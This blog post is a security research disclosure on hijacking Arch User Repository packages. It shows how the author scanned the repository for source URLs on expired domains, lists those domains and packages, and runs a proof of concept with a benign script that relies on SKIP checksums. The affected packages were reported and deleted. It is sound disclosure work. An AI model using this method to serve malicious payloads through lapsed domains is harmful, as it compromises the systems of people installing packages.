The Arch User Repository (AUR) is a software repository for Arch Linux. It differs from the official Arch Linux repositories in that its packages are provided by its users and not officially supported by Arch Linux.

The lack of support is more a feature than a bug, because it allows the AUR to contain packages that are difficult to support (e.g. because of licensing issues) or are only used by a handful of users. However, lack of support also means less quality control, which allows bad actors to introduce malicious packages. To warn users of this risk, the AUR has a big disclaimer on the front page:

DISCLAIMER: AUR packages are user produced content. Any use of the provided files is at your own risk.

There are multiple ways to introduce a malicious package (or malicious changes to a legitimate package) into the AUR. For example, by becoming the maintainer of orphaned packages (i.e. packages that are no longer supported by their previous maintainers) or typosquatting popular package names.

Another option is to find packages that use URLs with expired domains during their build process, register the domain and host malicious files. How many of packages are vulnerable to such an attack? Let’s find out!

PKGBUILD and SRCINFO files

The Arch Build System is the packaging system of Arch Linux. It is used for the official repositories, but also for the AUR. In the Arch Build System, packages consist of (at least) two files:

  1. PKGBUILD: A Bash script that defines variables and functions required to build and install a package. For example, the PKGBUILD of the zoom package:

     pkgname=zoom
     pkgver=5.12.2
     _subver=4816
     pkgrel=1
     pkgdesc="Video Conferencing and Web Conferencing Service"
     arch=('x86_64')
     license=('custom')
     url="https://zoom.us/"
     depends=('fontconfig' 'glib2' 'libpulse' 'libsm' 'ttf-font' 'libx11' 'libxtst' 'libxcb'
       'libxcomposite' 'libxfixes' 'libxi' 'libxcursor' 'libxkbcommon-x11' 'libxrandr'
       'libxrender' 'libxshmfence' 'libxslt' 'mesa' 'nss' 'xcb-util-image'
       'xcb-util-keysyms' 'dbus' 'libdrm')
     optdepends=('pulseaudio-alsa: audio via PulseAudio'
       'qt5-webengine: SSO login support'
       'ibus: remote control'
       'picom: extra compositor needed by some window managers for screen sharing'
       'xcompmgr: extra compositor needed by some window managers for screen sharing')
     options=(!strip)
     source=("${pkgname}-${pkgver}.${_subver}_orig_x86_64.pkg.tar.xz"::"https://cdn.zoom.us/prod/${pkgver}.${_subver}/zoom_x86_64.pkg.tar.xz")
     sha512sums=('1b7f28dedfa78998e7b36f12b16e21d79bd1a6ac2055abeb04c61ca22ffb688953f92bfdc5d7e9fd489b6b8baa936fa5fec1c78c53a085c5c9d668da436570c3')
    
     prepare() {
       sed -i 's/Zoom\.png/Zoom/g' "${srcdir}/usr/share/applications/Zoom.desktop"
       sed -i 's/StartupWMClass=Zoom/StartupWMClass=zoom/g' "${srcdir}/usr/share/applications/Zoom.desktop"
     }
    
     package() {
       cp -dpr --no-preserve=ownership opt usr "${pkgdir}"
     }
    
  2. .SRCINFO: A static file containing the metadata of a package (generated from the PKGBUILD file) as key-value pairs. For example, the .SRCINFO of the zoom package:

     pkgbase = zoom
       pkgdesc = Video Conferencing and Web Conferencing Service
       pkgver = 5.12.2
       pkgrel = 1
       url = https://zoom.us/
       arch = x86_64
       license = custom
       depends = fontconfig
       depends = glib2
       depends = libpulse
       depends = libsm
       depends = ttf-font
       depends = libx11
       depends = libxtst
       depends = libxcb
       depends = libxcomposite
       depends = libxfixes
       depends = libxi
       depends = libxcursor
       depends = libxkbcommon-x11
       depends = libxrandr
       depends = libxrender
       depends = libxshmfence
       depends = libxslt
       depends = mesa
       depends = nss
       depends = xcb-util-image
       depends = xcb-util-keysyms
       depends = dbus
       depends = libdrm
       optdepends = pulseaudio-alsa: audio via PulseAudio
       optdepends = qt5-webengine: SSO login support
       optdepends = ibus: remote control
       optdepends = picom: extra compositor needed by some window managers for screen sharing
       optdepends = xcompmgr: extra compositor needed by some window managers for screen sharing
       options = !strip
       source = zoom-5.12.2.4816_orig_x86_64.pkg.tar.xz::https://cdn.zoom.us/prod/5.12.2.4816/zoom_x86_64.pkg.tar.xz
       sha512sums = 1b7f28dedfa78998e7b36f12b16e21d79bd1a6ac2055abeb04c61ca22ffb688953f92bfdc5d7e9fd489b6b8baa936fa5fec1c78c53a085c5c9d668da436570c3
    
     pkgname = zoom
    

As we are interested in the URLs of the installation files of a package, we are looking for the source variable. The source variable defines the URLs (and filenames) to the necessary installation files. During installation, the URLs in the source are downloaded and installed (using functions provided in the PKGBUILD). For example, Zoom has one source: https://cdn.zoom.us/prod/5.12.2.4816/zoom_x86_64.pkg.tar.xz.

Packages can define multiple URLs and filenames in the source variables. Packages can also specify architecture-specific sources by using an architecture-specific array (e.g. source_x86_64).

Getting all .SRCINFO files

At the time of writing, there are 85793 packages in the AUR (the AUR provides a list of all packages at https://aur.archlinux.org/packages.gz). We will need to somehow get the .SRCINFO for each of them.

The AUR has an API. However, the API has a rate limit of 4000 requests per day (per IP address), making it unsuited for getting a full copy of the AUR.

Luckily, since July of this year, Arch Linux provides an official mirror of the AUR on GitHub. This is a huge repository (with a whopping 106670 branches), that we can clone to get a full local copy (i.e. the PKGBUILD and .SRCINFO files of all packages) of the AUR. We can than use a library like GitPython to automatically traverse the Git repository and get the .SRCINFO file for each package:

from git import Repo

repo = Repo("data/repos/aur")
refs = repo.remote().refs

for i, ref in enumerate(refs):
    package_name = ref.name.split("/")[-1]

    if package_name in ("HEAD", "master"):
        continue

    srcinfo = repo.commit(ref.commit).tree[".SRCINFO"].data_stream.read()

    # In this example, we just print the .SRCINFO data,
    # but we could save them (e.g. as files or in a database) for further analysis.
    print(package_name)
    print(srcinfo)

Finding Expired Domains

Now we have all .SRCINFO files, we can easily iterate through them and get the value of each source variable (and each architecture-specific source variable).

The source variable does not only define the domain where a source files can be found, but also the URI schemas (e.g. HTTPS) to use. As some packages use sources with esoteric URI schemas (e.g. gogdownloader:// in gog-unreal-tournament-goty) and other packages have typos in their source schemes (e.g. yhttps:// in emacs-d-mode), we only consider the following protocols:

  • HTTPS (55047 sources)
  • Git (2430 sources)
    • Git over HTTPS (28094 sources)
    • Git over HTTP (225 sources)
  • HTTP (12706 sources)
  • FTP (483 sources)
  • SVN (81 sources)

We parse the domains from all these sources (using urlparse and tldextract) to find 6926 unique domains and 5332 unique root domains. As we are looking for expired domains, we only care about root domains.

Unfortunately, there is no standardized way to check if a domain is available. The WHOIS responses from most popular TLDs contain something like “No match for domain” for available domains, but this is not true for all TLDs. A good first step is to filter out any domains that have an DNS A record set, as those domains will (most likely) still be in use. To quickly perform many DNS requests we use blechschmidt/massdns. This is a great tool that allows us to resolve thousands of domains in seconds:

$ massdns \
  --output J \ # Output the data to JSON
  --ignore NOERROR \ # Do not output any results that return an A record.
  --outfile data/dns-output-root-domains.txt \
  -r data/resolvers \ # Use 1.1.1.1, 8.8.8.8 and 8.8.4.4 as DNS resolvers
  data/root-domains.txt

After this, we are left with only 44 domains that do not have a A record associated with them. We can either manually check the WHOIS records for these domains or use some domain availability API (e.g. Domainr) to check if a domain has expired.

After filtering out some false positives, we are left with the 14 expired domains that are used in 20 packages:

# Domain Packages
0 acidhub.click firefox-vacuum gvim-checkpath wine-pixi2 xcursor-theme-wii
1 alunamation.com lightzone-free
2 chugunkov.website scalafmt-native
3 cqp.im coolq-pro-bin
4 crankysupertoon.live gmedit-bin mesen-s-bin
5 danym.org polly-b-gone
6 erwiz.de erwiz
7 hostedinspace.de totd
8 kygekteam.org kygekteampmmp4
9 relatif.moi servicewall-git
10 semi.works amuletml-bin
11 syw4e.info etherdump
12 tc.ink nap-bin
13 yugioh.vip iscfpc iscfpc-aarch64 iscfpcx

Checksums

Are all of these 20 packages hijackable by just registering the expired domains? No, because the Arch Build System has built-in checksum verification.

PKGBUILD files need to contain a hash (either CRC32, MD5, SHA-1, SHA-256, SHA-224, SHA-384, SHA-512 or BLAKE2) of each source that will be used to check the integrity of the source files during installation. If a source does not match the provided hash, the installation will abort.

This means that if we register an expired domain used by a package, we cannot host arbitrary files and expect them to be successfully installed. They would have to match the hash value.

There are no practical pre-image attacks against any of these hashes (with the notable exception of CRC32, which is not a cryptographic hash but an error correction code. However, CRC32 is only used by 16 packages), so we need to find a way to around the checksum verification altogether:

  • Users can skip the checksum verification when installing packages by passing the --skipinteg or the --skipchecksums option to makepkg (the command to install packages using PKGBUILD files).

  • Package maintainers can bypass the checksum verification for specific sources by using SKIP instead of actual hashes. This tells makepkg to skip the integrity check for that particular source. For example, the etherdu2048-cursesmp package does not verify the integrity of its sources:

      pkgname=2048-curses
      pkgver=1.2
      pkgrel=0
      pkgdesc="Curses based popular game 2048 written in C"
      arch=('x86_64' 'aarch64' 'armv7h')
      url="https://github.com/theretikgm/2048-curses"
      license=('GPL')
      depends=('ncurses>=6.0-0' 'git')
      source=("git+https://github.com/theretikgm/2048-curses.git")
      sha256sums=('SKIP')
      build() {
        cd "${srcdir}/${pkgname}/src"
        make
      }
    
      package() {
        install "${srcdir}/${pkgname}/src/${pkgname}" -D "${pkgdir}/usr/bin/${pkgname}"
      }
    

The use of SKIP is quite common. We counted 30245 packages (35.25% of total) that use SKIP for at least one source. A significant portion of these will use a Git repository (or some other CVS) directly as its source, which means that they have to use SKIP (or update the PKGBUILD with new hashes for every new commit). For example, 21278 (24.80% of total packages) of packages that use SKIP have a name that ends with “-git”.

4 of the 20 packages that we found use SKIP instead of actual hashes (we submitted deletion requests for all of them). Installing these packages is dangerous, because not only do they use sources with expired domains, but they also do not verify the integrity of any files downloaded from those domains.

As an aside, this is the number of uses of each hash type we counted (excluding SKIP values):

Hash # of uses % of total
SHA-256 54193 53.11%
MD5 25703 25.19%
SHA-512 13578 13.31%
SHA-1 4676 4.58%
BLAKE2 3682 3.61%
SHA-384 159 0.16%
SHA-224 31 0.03%
CRC32 16 0.02%

A Proof-of-Concept Package Hijack

Now that we four vulnerable packages, we will perform a proof-of-concept attack to show how such an attack would work. We anonymized the package name and domain by vulnerable-package and vulnerable-package.org, respectively.

Disclaimer: I understand that the applied anonymization is not strong and anyone that wants to find the vulnerable package will find it. I decided to publish this proof-of-concept attack, because: (a) it shows that this attack is possible on real-world packages, (b) package information is public and anybody that wants to find similarly vulnerable packages can do so, (c) the package is by definition broken and unused and (d) I notified the AUR by sending deletion requests.

The PKGBUILD of vulnerable-package looks like this:

pkgname=vulnerable-package
pkgver=4.0.0
pkgrel=2
pkgdesc="anonymized"
arch=(x86_64)
license=('GPL')
source=("https://jenkins.vulnerable-package.org/view/anonymized/job/anonymized-PHP-Binary/lastSuccessfulBuild/artifact/Linux/PHP_Linux-x86_64.tar.gz"
	"https://jenkins.vulnerable-package.org/view/anonymized/job/anonymized/lastSuccessfulBuild/artifact/start.sh"
)
sha256sums=('0ad82a11eb37ae6caddbf5d6a09a6d2e257cce3cbf5ff55e4a7465c5cf38e348'
            '601551a70f27acbf4214570532ede9eed011e0382a142e30b883ac7847b3cf51')

package() {
	mkdir $pkgdir/vulnerable-package
	cd $pkgdir/vulnerable-package
	rm $srcdir/PHP_Linux-x86_64.tar.gz
	cp -R $srcdir/* .
	chmod +x start.sh
}
sha256sums=('SKIP'
            'SKIP')

In short, this PKGBUILD downloads two files (PHP_Linux-x86_64.tar.gz and start.sh) from https://jenkins.vulnerable-package.org/ and copies them to the /vulnerable-package/ directory.

We can see that actual SHA-256 hashes are present, but they are overridden at the end with SKIP values.

Hijacking the Package

The first step in this attack is to buy and register vulnerable-package.org. This is easy enough and only costs about 10 bucks.

Next, we need a way to host files on our new domain. For this we can use a server we own or use a static content hosting provider like GitHub Pages or Cloudflare Pages.

Finally, we need two files that match the path and filenames of the files that are downloaded during the installation:

  1. view/anonymized/job/anonymized-PHP-Binary/lastSuccessfulBuild/artifact/Linux/PHP_Linux-x86_64.tar.gz
  2. view/anonymized/job/anonymized/lastSuccessfulBuild/artifact/start.sh

We leave the first file empty and add the following (benign) content to start.sh:

#! /usr/bin/env bash
echo "[+] Code Execution"

Installing and Executing the Hijacked Package

When a victim installs the hijacked package, nothing out of the ordinary happens. Files are downloaded, verified and installed:

Note: yay is a popular AUR helper, a program that automates installing AUR packages.

$ yay -Sy vulnerable-package
:: Synchronizing package databases...
 core is up to date
 extra is up to date
 community is up to date
 multilib is up to date
:: Checking for conflicts...
:: Checking for inner conflicts...
[Aur:1]  vulnerable-package-4.0.0-2

:: (1/1) Downloaded PKGBUILD: vulnerable-package
  1 vulnerable-package                        (Build Files Exist)
==> Diffs to show?
==> [N]one [A]ll [Ab]ort [I]nstalled [No]tInstalled or (1 2 3, 1-3, ^4)
==>
:: (1/1) Parsing SRCINFO: vulnerable-package

==> Making package: vulnerable-package 4.0.0-2
==> Retrieving sources...
  -> Downloading PHP_Linux-x86_64.tar.gz...
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100     1  100     1    0     0      4      0 --:--:-- --:--:-- --:--:--     4
  -> Downloading start.sh...
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    48  100    48    0     0    247      0 --:--:-- --:--:-- --:--:--   250
==> Validating source files with sha256sums...
    PHP_Linux-x86_64.tar.gz ... Skipped
    start.sh ... Skipped
==> Making package: vulnerable-package 4.0.0-2
==> Checking runtime dependencies...
==> Checking buildtime dependencies...
==> Retrieving sources...
  -> Found PHP_Linux-x86_64.tar.gz
  -> Found start.sh
==> Validating source files with sha256sums...
    PHP_Linux-x86_64.tar.gz ... Skipped
    start.sh ... Skipped
==> Removing existing $srcdir/ directory...
==> Extracting sources...
==> Sources are ready.
==> Making package: vulnerable-package 4.0.0-2
==> Checking runtime dependencies...
==> Checking buildtime dependencies...
==> WARNING: Using existing $srcdir/ tree
==> Entering fakeroot environment...
==> Starting package()...
==> Tidying install...
  -> Removing libtool files...
  -> Purging unwanted files...
  -> Removing static library files...
  -> Stripping unneeded symbols from binaries and libraries...
  -> Compressing man and info pages...
==> Checking for packaging issues...
==> Creating package "vulnerable-package"...
  -> Generating .PKGINFO file...
  -> Generating .BUILDINFO file...
  -> Generating .MTREE file...
  -> Compressing package...
==> Leaving fakeroot environment.
==> Finished making: vulnerable-package 4.0.0-2
==> Cleaning up...
loading packages...
resolving dependencies...
looking for conflicting packages...

Packages (1) vulnerable-package-4.0.0-2

:: Proceed with installation? [Y/n]
(1/1) checking keys in keyring
(1/1) checking package integrity
(1/1) loading package files
(1/1) checking for file conflicts
(1/1) checking available disk space
:: Processing package changes...
(1/1) installing vulnerable-package

But when they actually to run the software they just installed, it actually runs our files:

$ /vulnerable-package/start.sh
[+] Code Execution
$ cat /vulnerable-package/start.sh
#! /usr/bin/env bash
echo "[+] Code Execution"

In this fictitious scenario, we have successfully gained arbitrary code execution on a victim system!

Discussion

In this blog post we have shown that it is possible to hijack AUR packages by targeting the domains used in the installation process of those packages. Hijacking AUR packages is not a new concept. As we said in the introduction, hijacking AUR packages has always been possible (in multiple ways) and is a known risk.

However, hijacking a package by registering domains is harder to detect and other methods, because the change of domain ownership is not registered by the AUR (unlike a malicious change to a PKGDBUILD file).

In the end we found 4 (out of 85793 total) packages that are vulnerable to this attack. These packages are installed by only a handful of users, if any, because they are broken by definition. This shows that this attack is feasible, but not practical.

The best way to protect against this kind of attack is to enforce the integrity of source files by setting hash values. We saw that this is, unfortunately, not done for a significant portion (35%) of packages.

To help make the AUR (slightly) safer, I have submitted deletion requests for all the vulnerable packages.

Update: All vulnerable packages have been deleted.

What About the Official Repositories?

The official Arch Linux repositories also use the Arch Build System and there are also GitHub mirrors available for these repositories:

Luckily, these have a higher level of quality control, and we did not find any expired domains in them.